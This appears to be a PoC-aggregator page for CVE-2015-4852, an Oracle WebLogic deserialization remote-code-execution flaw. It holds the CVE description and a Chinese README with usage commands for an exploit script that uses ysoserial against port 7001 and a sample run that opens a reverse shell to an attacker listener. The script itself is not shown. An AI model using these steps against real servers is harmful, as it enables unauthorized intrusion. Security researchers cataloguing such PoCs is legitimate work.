CVE-2015-4852 PoC — Oracle WebLogic Server WLS Security组件安全漏洞

Source

https://github.com/nex1less/CVE-2015-4852

Associated Vulnerability

Title:Oracle WebLogic Server WLS Security组件安全漏洞 (CVE-2015-4852)
Description:The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.

Readme

# CVE-2015-4852
前提 需要将ysoserial.jar放置于脚本目录之下（将ysoserial-0*.jar重命名为ysoserial.jar）,最好使用kali linux执行该脚本

1.使用方法：

root@kali:~# python3 CVE-2015-4852.py -h

Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001


Options:

  -h, --help            show this help message and exit
  
  -t TARGET, --target=TARGET ip port
  
  
2.例： 

root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001

请输入监听ip地址：10.6.214.1

请输入监听端口：7777

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

执行成功

获得shell

File Snapshot


 [4.0K]  /data/pocs/772a040e7043536e17f6cedda9ac525d76c1ef51
├── [2.0K]  CVE-2015-4852.py
└── [ 638]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!